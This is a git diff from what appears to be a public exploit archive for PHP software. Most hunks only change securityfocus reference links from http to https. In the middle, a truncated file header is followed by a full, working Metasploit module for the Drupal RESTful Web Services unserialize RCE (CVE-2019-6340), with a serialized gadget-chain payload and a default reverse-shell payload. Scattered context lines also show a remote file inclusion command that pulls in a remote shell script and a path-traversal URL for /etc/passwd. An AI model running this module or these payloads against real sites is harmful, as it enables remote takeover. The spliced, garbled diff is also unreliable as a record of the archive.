+++ b/exploits/php/local/20985.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2954/info +source: https://www.securityfocus.com/bid/2954/info PHP is the Personal HomePage development toolkit, distributed by the PHP.net, and maintained by the PHP Development Team in public domain. diff --git a/exploits/php/local/21347.php b/exploits/php/local/21347.php index 3c7c0e393..b7074d65e 100644 --- a/exploits/php/local/21347.php +++ b/exploits/php/local/21347.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4325/info +source: https://www.securityfocus.com/bid/4325/info PHP is a server side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix based operating systems. It is commonly used for web development, and is very widely deployed. diff --git a/exploits/php/local/22911.php b/exploits/php/local/22911.php index 28c5ffb88..ae0e69765 100644 --- a/exploits/php/local/22911.php +++ b/exploits/php/local/22911.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8201/info +source: https://www.securityfocus.com/bid/8201/info PHP is prone to an issue that may allow programs to bypass Safe Mode by calling external files in restricted directories using include() and require(). diff --git a/exploits/php/local/23022.c b/exploits/php/local/23022.c index 673d2df60..c3c4a54be 100644 --- a/exploits/php/local/23022.c +++ b/exploits/php/local/23022.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8405/info +// source: https://www.securityfocus.com/bid/8405/info A vulnerability has been reported to present itself in the dlopen() function contained in the PHP source. The issue occurs when PHP is used in conjunction with the Apache web server. A local attacker may exploit this issue to gain unauthorized access to potentially sensitive information. diff --git a/exploits/php/local/23023.c b/exploits/php/local/23023.c index 77f67d60e..8cfb8383c 100644 --- a/exploits/php/local/23023.c +++ b/exploits/php/local/23023.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8405/info +// source: https://www.securityfocus.com/bid/8405/info A vulnerability has been reported to present itself in the dlopen() function contained in the PHP source. The issue occurs when PHP is used in conjunction with the Apache web server. A local attacker may exploit this issue to gain unauthorized access to potentially sensitive information. diff --git a/exploits/php/local/24173.txt b/exploits/php/local/24173.txt index 78d8d3986..80ce7a37c 100644 --- a/exploits/php/local/24173.txt +++ b/exploits/php/local/24173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10471/info +source: https://www.securityfocus.com/bid/10471/info PHP is reportedly prone to a command execution vulnerability in its shell escape functions. This issue is due to a failure of PHP to properly sanitize function arguments. diff --git a/exploits/php/local/25040.php b/exploits/php/local/25040.php index 96f3ccc3e..c2c3d7f1e 100644 --- a/exploits/php/local/25040.php +++ b/exploits/php/local/25040.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12045/info +source: https://www.securityfocus.com/bid/12045/info PHP shared memory module (shmop) is reported prone to an integer handling vulnerability. The issue exists in the PHP_FUNCTION(shmop_write) function and is as a result of a lack of sufficient sanitization performed on 'offset' data. diff --git a/exploits/php/local/26352.php b/exploits/php/local/26352.php index 7817e7840..4ea3fcfca 100644 --- a/exploits/php/local/26352.php +++ b/exploits/php/local/26352.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15119/info +source: https://www.securityfocus.com/bid/15119/info PHP is prone to multiple vulnerabilities that permit an attacker to bypass the 'safedir' directory restriction. diff --git a/exploits/php/local/27334.txt b/exploits/php/local/27334.txt index 09c0b1e00..9b106455f 100644 --- a/exploits/php/local/27334.txt +++ b/exploits/php/local/27334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16878/info +source: https://www.securityfocus.com/bid/16878/info PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. diff --git a/exploits/php/local/27335.txt b/exploits/php/local/27335.txt index 6e5cdff77..c0a6deb0c 100644 --- a/exploits/php/local/27335.txt +++ b/exploits/php/local/27335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16878/info +source: https://www.securityfocus.com/bid/16878/info PHP is prone to multiple input-validation vulnerabilities that could allow 'safe_mode' and 'open_basedir' security settings to be bypassed. These issues reside in the 'mb_send_mail()' function, the 'mail()' function, and various PHP IMAP functions. diff --git a/exploits/php/local/28504.php b/exploits/php/local/28504.php index 1b79e89ab..ecef41536 100644 --- a/exploits/php/local/28504.php +++ b/exploits/php/local/28504.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19933/info +source: https://www.securityfocus.com/bid/19933/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations. diff --git a/exploits/php/local/29239.txt b/exploits/php/local/29239.txt index 88b25de48..f3a2d803a 100644 --- a/exploits/php/local/29239.txt +++ b/exploits/php/local/29239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21508/info +source: https://www.securityfocus.com/bid/21508/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations. diff --git a/exploits/php/local/29528.txt b/exploits/php/local/29528.txt index 80a539d40..3e6b8ffea 100644 --- a/exploits/php/local/29528.txt +++ b/exploits/php/local/29528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22261/info +source: https://www.securityfocus.com/bid/22261/info PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible. diff --git a/exploits/php/local/29712.txt b/exploits/php/local/29712.txt index dff7a4ce5..7d2deea5b 100644 --- a/exploits/php/local/29712.txt +++ b/exploits/php/local/29712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22802/info +source: https://www.securityfocus.com/bid/22802/info The Zend Platform is prone to an issue that may let local attackers modify the PHP configuration file ('php.ini'). This issue occurs because the application is installed with an 'ini_modifier' program that may be executed by local users and will bypass the authentication that is required by the application to change the configuration file. diff --git a/exploits/php/local/29801.php b/exploits/php/local/29801.php index 20e8fac0b..381d07e0c 100644 --- a/exploits/php/local/29801.php +++ b/exploits/php/local/29801.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23183/info +source: https://www.securityfocus.com/bid/23183/info PHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error. diff --git a/exploits/php/local/29804.php b/exploits/php/local/29804.php index cfe03d1fa..fa7226227 100644 --- a/exploits/php/local/29804.php +++ b/exploits/php/local/29804.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23202/info +source: https://www.securityfocus.com/bid/23202/info PHP is prone to an information-disclosure vulnerability due to a design error. diff --git a/exploits/php/local/31937.txt b/exploits/php/local/31937.txt index fbc8c023e..70bbdddef 100644 --- a/exploits/php/local/31937.txt +++ b/exploits/php/local/31937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29796/info +source: https://www.securityfocus.com/bid/29796/info PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. diff --git a/exploits/php/local/32343.php b/exploits/php/local/32343.php index 13190b716..9cb4f0fc4 100644 --- a/exploits/php/local/32343.php +++ b/exploits/php/local/32343.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31064/info +source: https://www.securityfocus.com/bid/31064/info PHP is prone to 'safe_mode_exec_dir' and 'open_basedir' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to execute arbitrary code. diff --git a/exploits/php/local/32693.php b/exploits/php/local/32693.php index 99bd41eda..5e71b8e5a 100644 --- a/exploits/php/local/32693.php +++ b/exploits/php/local/32693.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33073/info +source: https://www.securityfocus.com/bid/33073/info suPHP is prone to a 'safe_mode' restriction-bypass vulnerability. diff --git a/exploits/php/local/32901.php b/exploits/php/local/32901.php index fb5c50e1c..12bf967a9 100644 --- a/exploits/php/local/32901.php +++ b/exploits/php/local/32901.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34475/info +source: https://www.securityfocus.com/bid/34475/info PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations. diff --git a/exploits/php/local/33161.php b/exploits/php/local/33161.php index 166902c49..838a46eb7 100644 --- a/exploits/php/local/33161.php +++ b/exploits/php/local/33161.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36007/info +source: https://www.securityfocus.com/bid/36007/info PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error. diff --git a/exploits/php/remote/19553.txt b/exploits/php/remote/19553.txt index dec469549..21708d664 100644 --- a/exploits/php/remote/19553.txt +++ b/exploits/php/remote/19553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/713/info +source: https://www.securityfocus.com/bid/713/info The PHP/FI package which was originally written by Rasmus Lerdorf is an is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. diff --git a/exploits/php/remote/19708.php b/exploits/php/remote/19708.php index 6fb0e070d..b4b67b1b2 100644 --- a/exploits/php/remote/19708.php +++ b/exploits/php/remote/19708.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/911/info +source: https://www.securityfocus.com/bid/911/info PHP Version 3.0 is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. diff --git a/exploits/php/remote/20286.c b/exploits/php/remote/20286.c index 6ded9c021..d7cdcd7a8 100644 --- a/exploits/php/remote/20286.c +++ b/exploits/php/remote/20286.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1786/info +// source: https://www.securityfocus.com/bid/1786/info PHP is a scripting language designed for CGI applications that is used on many websites. There exists a remotely exploitable format string vulnerability in all versions of PHP below PHP 4.0.3. diff --git a/exploits/php/remote/21155.txt b/exploits/php/remote/21155.txt index a3de7ebcb..aea4bb0ed 100644 --- a/exploits/php/remote/21155.txt +++ b/exploits/php/remote/21155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3552/info +source: https://www.securityfocus.com/bid/3552/info Network Tool is a PHPNuke addon, written and maintained by Rick Fournier. It is designed to offer network features such as nmap, traceroute, and ping from a web interface. diff --git a/exploits/php/remote/21264.php b/exploits/php/remote/21264.php index 41218bbaa..b9b28867a 100644 --- a/exploits/php/remote/21264.php +++ b/exploits/php/remote/21264.php @@ -1,6 +1,6 @@ 'Drupal RESTful Web Services unserialize() RCE', + 'Description' => %q{ + This module exploits a PHP unserialize() vulnerability in Drupal RESTful + Web Services by sending a crafted request to the /node REST endpoint. + + As per SA-CORE-2019-003, the initial remediation was to disable POST, + PATCH, and PUT, but Ambionics discovered that GET was also vulnerable + (albeit cached). Cached nodes can be exploited only once. + + Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of + this alternate vector. + + Drupal < 8.5.11 and < 8.6.10 are vulnerable. + }, + 'Author' => [ + 'Jasper Mattsson', # Discovery + 'Charles Fol', # PoC + 'Rotem Reiss', # Module + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2019-6340'], + ['URL', 'https://www.drupal.org/sa-core-2019-003'], + ['URL', 'https://www.drupal.org/psa-2019-02-22'], + ['URL', 'https://www.ambionics.io/blog/drupal8-rce'], + ['URL', 'https://github.com/ambionics/phpggc'], + ['URL', 'https://twitter.com/jcran/status/1099206271901798400'] + ], + 'DisclosureDate' => '2019-02-20', + 'License' => MSF_LICENSE, + 'Platform' => ['php', 'unix'], + 'Arch' => [ARCH_PHP, ARCH_CMD], + 'Privileged' => false, + 'Targets' => [ + ['PHP In-Memory', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Type' => :php_memory, + 'Payload' => {'BadChars' => "'"}, + 'DefaultOptions' => { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + } + ], + ['Unix In-Memory', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/generic', + 'CMD' => 'id' + } + ] + ], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliablity' => [UNRELIABLE_SESSION], # When using the GET method + 'AKA' => ['SA-CORE-2019-003'] + } + )) + + register_options([ + OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST', + ['GET', 'POST', 'PATCH', 'PUT']]), + OptInt.new('NODE', [false, 'Node ID to target with GET method', 1]) + ]) + + register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + end + + def check + checkcode = CheckCode::Unknown + + version = drupal_version + + unless version + vprint_error('Could not determine Drupal version') + return checkcode + end + + if version.to_s !~ /^8\b/ + vprint_error("Drupal #{version} is not supported") + return CheckCode::Safe + end + + vprint_status("Drupal #{version} targeted at #{full_uri}") + checkcode = CheckCode::Detected + + changelog = drupal_changelog(version) + + unless changelog + vprint_error('Could not determine Drupal patch level') + return checkcode + end + + case drupal_patch(changelog, 'SA-CORE-2019-003') + when nil + vprint_warning('CHANGELOG.txt no longer contains patch level') + when true + vprint_warning('Drupal appears patched in CHANGELOG.txt') + checkcode = CheckCode::Safe + when false + vprint_good('Drupal appears unpatched in CHANGELOG.txt') + checkcode = CheckCode::Appears + end + + # Any further with GET and we risk caching the targeted node + return checkcode if meth == 'GET' + + # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable + token = Rex::Text.rand_text_alphanumeric(8..42) + res = execute_command("echo #{token}") + + return checkcode unless res + + if res.body.include?(token) + vprint_good('Drupal is vulnerable to code execution') + checkcode = CheckCode::Vulnerable + end + + checkcode + end + + def exploit + if [CheckCode::Safe, CheckCode::Unknown].include?(check) + if datastore['ForceExploit'] + print_warning('ForceExploit set! Exploiting anyway!') + else + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + end + + if datastore['PAYLOAD'] == 'cmd/unix/generic' + print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') + # XXX: Naughty datastore modification + datastore['DUMP_OUTPUT'] = true + end + + case target['Type'] + when :php_memory + # XXX: This will spawn a *very* obvious process + execute_command("php -r '#{payload.encoded}'") + when :unix_memory + execute_command(payload.encoded) + end + end + + def execute_command(cmd, opts = {}) + vprint_status("Executing with system(): #{cmd}") + + # https://en.wikipedia.org/wiki/Hypertext_Application_Language + hal_json = JSON.pretty_generate( + 'link' => [ + 'value' => 'link', + 'options' => phpggc_payload(cmd) + ], + '_links' => { + 'type' => { + 'href' => vhost_uri + } + } + ) + + print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}") + + res = send_request_cgi({ + 'method' => meth, + 'uri' => node_uri, + 'ctype' => 'application/hal+json', + 'vars_get' => {'_format' => 'hal_json'}, + 'data' => hal_json + }, 3.5) + + return unless res + + case res.code + # 401 isn't actually a failure when using the POST method + when 200, 401 + print_line(res.body) if datastore['DUMP_OUTPUT'] + if meth == 'GET' + print_warning('If you did not get code execution, try a new node ID') + end + when 404 + print_error("#{node_uri} not found") + when 405 + print_error("#{meth} method not allowed") + when 422 + print_error('VHOST may need to be set') + when 406 + print_error('Web Services may not be enabled') + else + print_error("Unexpected reply: #{res.inspect}") + end + + res + end + + # phpggc Guzzle/RCE1 system id + def phpggc_payload(cmd) + ( + # http://www.phpinternalsbook.com/classes_objects/serialization.html + <<~EOF + O:24:"GuzzleHttp\\Psr7\\FnStream":2:{ + s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{ + s:5:"close";a:2:{ + i:0;O:23:"GuzzleHttp\\HandlerStack":3:{ + s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler"; + s:cmd_len:"cmd"; + s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack"; + a:1:{i:0;a:1:{i:0;s:6:"system";}} + s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached"; + b:0; + } + i:1;s:7:"resolve"; + } + } + s:9:"_fn_close";a:2:{ + i:0;r:4; + i:1;s:7:"resolve"; + } + } + EOF + ).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd) + end + + def meth + datastore['METHOD'] || 'POST' + end + + def node + datastore['NODE'] || 1 + end + + def node_uri + if meth == 'GET' + normalize_uri(target_uri.path, '/node', node) + else + normalize_uri(target_uri.path, '/node') + end + end + + def vhost_uri + full_uri( + normalize_uri(target_uri.path, '/rest/type/shortcut/default'), + vhost_uri: true + ) + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/10002.txt b/exploits/php/webapps/10002.txt index 709834fd4..ef432eeb5 100644 --- a/exploits/php/webapps/10002.txt +++ b/exploits/php/webapps/10002.txt @@ -73,7 +73,7 @@ In the UTF-8 fork the password cookie is salted with a prefix of 'FqZm$()G_~<' a A XSS bug was reported by DeltahackingTEAM on 2008-11-07 which I am unable to reproduce. The details are: Exploit: http://www.example.com/register.php?config_skin=../../../../etc/passwd%00 -Link: http://www.securityfocus.com/bid/32142/info +Link: https://www.securityfocus.com/bid/32142/info UTF-8 Cute News has not been reviewed except to check whether if it is effected by vulnerabilities found in Cute News 1.4.6. diff --git a/exploits/php/webapps/10181.txt b/exploits/php/webapps/10181.txt index 355394e3c..a5dfbbe93 100644 --- a/exploits/php/webapps/10181.txt +++ b/exploits/php/webapps/10181.txt @@ -6,7 +6,7 @@ # [+] Method : Remote File Inclusion # [+] Location : INDONESIA # [~] Notes : I know this is an old bugs, but i just write this exploit under perl module. -# [~] Refrence : http://www.securityfocus.com/bid/13965 +# [~] Refrence : https://www.securityfocus.com/bid/13965 # [~] How To : # perl tux.pl cmd # perl tux.pl http://server/path/ http://www.indonesiancoder.org/shell.txt cmd diff --git a/exploits/php/webapps/1050.pl b/exploits/php/webapps/1050.pl index 637fc0b1e..e4e6824b3 100755 --- a/exploits/php/webapps/1050.pl +++ b/exploits/php/webapps/1050.pl @@ -9,7 +9,7 @@ # # # # # + Discovered By: GulfTech # -# + Advisory: http://www.securityfocus.com/bid/13967 # +# + Advisory: https://www.securityfocus.com/bid/13967 # #Vulnerable: PHP Arena paFileDB 1.1.3 and Older # ###################################################################################### # GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke # diff --git a/exploits/php/webapps/11183.txt b/exploits/php/webapps/11183.txt index 5e73d3011..0f65bfed0 100644 --- a/exploits/php/webapps/11183.txt +++ b/exploits/php/webapps/11183.txt @@ -1,7 +1,7 @@ 1.Title :Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System. Discovered by: Prashant Khandelwal (clickprashant@gmail.com) Submitted :Jan-15-2010 - Bugtraq id : http://www.securityfocus.com/bid/37824 + Bugtraq id : https://www.securityfocus.com/bid/37824 Secunia : http://secunia.com/advisories/38201/ 2.Vulnerability Information diff --git a/exploits/php/webapps/15174.txt b/exploits/php/webapps/15174.txt index ac3da4684..0777094ff 100644 --- a/exploits/php/webapps/15174.txt +++ b/exploits/php/webapps/15174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43507/info +source: https://www.securityfocus.com/bid/43507/info Tiki Wiki CMS Groupware is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/1652.php b/exploits/php/webapps/1652.php index c6111367d..41571a0f3 100644 --- a/exploits/php/webapps/1652.php +++ b/exploits/php/webapps/1652.php @@ -22,7 +22,7 @@ die; /* this is based on - http://www.securityfocus.com/bid/16187 + https://www.securityfocus.com/bid/16187 but... look at the server.php source code: diff --git a/exploits/php/webapps/16992.txt b/exploits/php/webapps/16992.txt index a2a9570b2..a128445a7 100644 --- a/exploits/php/webapps/16992.txt +++ b/exploits/php/webapps/16992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46846/info +source: https://www.securityfocus.com/bid/46846/info Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/17951.txt b/exploits/php/webapps/17951.txt index 77cfa1c6a..bf0a8dc5e 100644 --- a/exploits/php/webapps/17951.txt +++ b/exploits/php/webapps/17951.txt @@ -153,5 +153,5 @@ References: =========== http://www.openengine.de/ -http://www.securityfocus.com/bid/49794/info +https://www.securityfocus.com/bid/49794/info http://www.rul3z.de/advisories/SSCHADV2011-019.txt \ No newline at end of file diff --git a/exploits/php/webapps/18155.txt b/exploits/php/webapps/18155.txt index 7fa161c0a..d6bcc21e4 100644 --- a/exploits/php/webapps/18155.txt +++ b/exploits/php/webapps/18155.txt @@ -81,7 +81,7 @@ IX. REFERENCES ------------------------- http://www.zabbix.com https://support.zabbix.com/browse/ZBX-4385 -http://www.securityfocus.com/bid/50803/info +https://www.securityfocus.com/bid/50803/info X. CREDITS ------------------------- diff --git a/exploits/php/webapps/18251.txt b/exploits/php/webapps/18251.txt index c95a3ddec..f56ce948b 100644 --- a/exploits/php/webapps/18251.txt +++ b/exploits/php/webapps/18251.txt @@ -11,7 +11,7 @@ # # Script Page : null # -# Reference : http://www.securityfocus.com/bid/47971/info +# Reference : https://www.securityfocus.com/bid/47971/info ################################################################################################ # # SQL Vulnerability diff --git a/exploits/php/webapps/18875.txt b/exploits/php/webapps/18875.txt index b00060d25..80c5b1d76 100644 --- a/exploits/php/webapps/18875.txt +++ b/exploits/php/webapps/18875.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53463/info +source: https://www.securityfocus.com/bid/53463/info Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/1921.pl b/exploits/php/webapps/1921.pl index ebd7f2dc5..f601b07e5 100755 --- a/exploits/php/webapps/1921.pl +++ b/exploits/php/webapps/1921.pl @@ -3,7 +3,7 @@ # TUFaT FlashBB <= 1.1.5 (phpbb_root_path) Remote File Include Exploit # Bugs found & code By h4ntu aka TeloGanyong # -## base on http://www.securityfocus.com/bid/18456/ +## base on https://www.securityfocus.com/bid/18456/ # ## # http://h4ntu.com (c) 2006 diff --git a/exploits/php/webapps/20158.txt b/exploits/php/webapps/20158.txt index c998d91e6..7785802d3 100644 --- a/exploits/php/webapps/20158.txt +++ b/exploits/php/webapps/20158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1592/info +source: https://www.securityfocus.com/bid/1592/info PHP-Nuke is a website creation/maintainence tool written in PHP3. It is possible to elevate priviliges in this system from normal user to administrator due to a flaw in authentication code. The problem occurs here: diff --git a/exploits/php/webapps/20208.txt b/exploits/php/webapps/20208.txt index db4fe97d8..4db8de63b 100644 --- a/exploits/php/webapps/20208.txt +++ b/exploits/php/webapps/20208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1650/info +source: https://www.securityfocus.com/bid/1650/info The explorer.php script within phpPhotoAlbum 0.9.9 and possibly previous versions are vulnerable to directory traversal. By requesting a URL composed of explorer.php and the ../ string in the value of the "folder" variable it is possible for a remote user to and gain read access to any file or browse any directory for which the webserver has read access. diff --git a/exploits/php/webapps/20278.txt b/exploits/php/webapps/20278.txt index 643422e4d..3de40453f 100644 --- a/exploits/php/webapps/20278.txt +++ b/exploits/php/webapps/20278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1773/info +source: https://www.securityfocus.com/bid/1773/info PHPix is a web-based photo-album system written in PHP. It is vulnerable to an attack that allows a malicious remote user to view arbitrary files on the target webserver with the privileges of the webserver. The problem is that "../" character sequences can be supplied by the user in an http variable that is used to reference a file on the webservers filesystem. As a result, the attacker can construct a path relative to the current working directory of the webserver using ".."'s and then the target filename/path to read any readable (to the uid of the httpd process) file on the filesystem. The information gained may make it easier to compromise the system in other ways. diff --git a/exploits/php/webapps/2030.txt b/exploits/php/webapps/2030.txt index c8c24d3e0..4f7114ae7 100644 --- a/exploits/php/webapps/2030.txt +++ b/exploits/php/webapps/2030.txt @@ -8,7 +8,7 @@ Author : Ahmad Maulana a.k.a Matdhule Date : July 14th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv39-matdhule-2006.txt - http://www.securityfocus.com/bid/18998 + https://www.securityfocus.com/bid/18998 Critical Lvl : Highly critical Impact : System access Where : From Remote diff --git a/exploits/php/webapps/20428.txt b/exploits/php/webapps/20428.txt index e16df578f..b6968dedb 100644 --- a/exploits/php/webapps/20428.txt +++ b/exploits/php/webapps/20428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1985/info +source: https://www.securityfocus.com/bid/1985/info Phorum is a PHP based web forums package. Due to an error in the implementation of forum selection in administrative scripts, any user can view the any PHP script on the target host. This is due to user-supplied input being referenced as a filename in two locations in the file common.php. For example: diff --git a/exploits/php/webapps/20431.txt b/exploits/php/webapps/20431.txt index 41a2c1a58..a7004c750 100644 --- a/exploits/php/webapps/20431.txt +++ b/exploits/php/webapps/20431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1997/info +source: https://www.securityfocus.com/bid/1997/info Phorum is a PHP based web forums package. Due to an error in the handling of user input in administrative scripts, any user can view the any file readable by the webserver on the target host. This is due to user-supplied input being referenced as a filename in two locations in the file common.php. diff --git a/exploits/php/webapps/20538.txt b/exploits/php/webapps/20538.txt index 3db9038b9..233105c5a 100644 --- a/exploits/php/webapps/20538.txt +++ b/exploits/php/webapps/20538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2198/info +source: https://www.securityfocus.com/bid/2198/info A vulnerability has been reported in basilix webmail v. 0.9.7b. diff --git a/exploits/php/webapps/20586.txt b/exploits/php/webapps/20586.txt index 4c8aaa4e2..a36de62eb 100644 --- a/exploits/php/webapps/20586.txt +++ b/exploits/php/webapps/20586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2271/info +source: https://www.securityfocus.com/bid/2271/info Phorum is a popular, free, open source software package originally written by Brian Moon. The package is designed to add chat/bulletin board style interaction between visitors of a web site. diff --git a/exploits/php/webapps/20587.txt b/exploits/php/webapps/20587.txt index f9cf120a0..f7824f613 100644 --- a/exploits/php/webapps/20587.txt +++ b/exploits/php/webapps/20587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2272/info +source: https://www.securityfocus.com/bid/2272/info Phorum is a freely available, open source package originally written by Brian Moon. The package is designed to add enhanced features to a web page, allowing users to interact through bulletin board style chats forums and discussions. diff --git a/exploits/php/webapps/20588.txt b/exploits/php/webapps/20588.txt index 8d0925ead..eb836348e 100644 --- a/exploits/php/webapps/20588.txt +++ b/exploits/php/webapps/20588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2274/info +source: https://www.securityfocus.com/bid/2274/info Phorum is a freely available, open source, popular WWW Board written by Brian Moon. It is designed to enhance the services offered on a web page, allow users to interact with one another through bulletin board chat and discussion. diff --git a/exploits/php/webapps/20729.txt b/exploits/php/webapps/20729.txt index 983bd3a46..0b6eb3588 100644 --- a/exploits/php/webapps/20729.txt +++ b/exploits/php/webapps/20729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2544/info +source: https://www.securityfocus.com/bid/2544/info PHP-Nuke is a website creation/maintainence tool written in PHP3. diff --git a/exploits/php/webapps/20848.txt b/exploits/php/webapps/20848.txt index f7d5f8ab8..11244fee8 100644 --- a/exploits/php/webapps/20848.txt +++ b/exploits/php/webapps/20848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2724/info +source: https://www.securityfocus.com/bid/2724/info PHPSlash is a widely used open source Groupware utility. diff --git a/exploits/php/webapps/20995.txt b/exploits/php/webapps/20995.txt index a46493112..175c3675e 100644 --- a/exploits/php/webapps/20995.txt +++ b/exploits/php/webapps/20995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2987/info +source: https://www.securityfocus.com/bid/2987/info Cobalt Qube is an fully-featured network "server appliance". It includes pre-installed tools and applications and can be put online with very little configuration. diff --git a/exploits/php/webapps/20996.txt b/exploits/php/webapps/20996.txt index b2e59b5f1..3ca66f85d 100644 --- a/exploits/php/webapps/20996.txt +++ b/exploits/php/webapps/20996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2995/info +source: https://www.securityfocus.com/bid/2995/info Basilix is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support. diff --git a/exploits/php/webapps/21022.txt b/exploits/php/webapps/21022.txt index 3cfb8d463..23427a085 100644 --- a/exploits/php/webapps/21022.txt +++ b/exploits/php/webapps/21022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3079/info +source: https://www.securityfocus.com/bid/3079/info The PHP Base Library('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator. diff --git a/exploits/php/webapps/21038.txt b/exploits/php/webapps/21038.txt index 95a9c3dc2..485dd7f71 100644 --- a/exploits/php/webapps/21038.txt +++ b/exploits/php/webapps/21038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3107/info +source: https://www.securityfocus.com/bid/3107/info PHP-Nuke is a website creation/maintenance tool written in PHP3. diff --git a/exploits/php/webapps/21046.txt b/exploits/php/webapps/21046.txt index 869b5bf4d..50e3fb7f7 100644 --- a/exploits/php/webapps/21046.txt +++ b/exploits/php/webapps/21046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3142/info +source: https://www.securityfocus.com/bid/3142/info phpBB is free, open-source, easy-to-use web forums software. diff --git 